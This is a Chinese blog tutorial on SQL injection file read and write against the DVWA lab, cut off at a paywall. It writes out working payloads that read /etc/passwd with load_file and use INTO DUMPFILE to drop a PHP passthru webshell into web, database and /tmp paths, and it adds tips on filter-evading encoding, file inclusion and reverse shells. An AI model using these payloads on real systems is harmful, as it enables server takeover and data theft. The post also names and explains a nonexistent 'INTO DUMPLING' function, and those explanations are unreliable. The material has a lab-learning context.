本文介绍了如何通过SQL注入来读取和写入文件,以及如何利用此技术反弹shell。提到了利用`load_file`函数读取`/etc/passwd`,并探讨了在无权限写入时如何利用temp目录。还讨论了木马编码绕过过滤机制,以及通过数据库的INTO DUMPLING功能将二进制文件转化为PHP代码。此外,文章提及了数据窃取的策略,包括拖库和文件包含漏洞的利用。
读取文件【使用load_file函数】
’ union SELECT null,load_file(’/etc/passwd’)–(有一个空格)
也可以使用burpsuite进行注入
写入文件
' union select null,"<?php passthru($_GET['cmd']); ?>" INTO DUMPFILE "/var/www/a.php" --+ 【写入一句话木马;INTO DUMPLING:MySQL函数,将输入下载在数据库中】
此语句往往会提示无法写入,因为缺少权限
' union select null,"<?php passthru($_GET['cmd']); ?>" INTO DUMPFILE 'a.php' --+ 【将其写入默认路径(使用单引号): /var/lib/mysql/dvwa/a.php (dvwa的账号)】
但是要先清除路径才好利用,但是至少证明可以写入文件
#当无权限进行指定目录写入文件时,可以尝试写入到temp目录下,然后在利用文件包含漏洞进行操作
' union select null, "<?php passthru($_GET['cmd']); ?>" INTO DUMPFILE "/tmp/a.php" --+
上传反弹shell
注:当通过URL注入网页木马时,“<”、“?”、“php”、“>”等字符可能会触发过滤机制,所以,应使用编码绕过
将网页木马编译成二进制文件,数据库会使用INTO DUMPLING将其转换成PHP代码储存
复制设置反弹shell
编码
cat b.
最低0.47元/天 解锁文章
3513
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
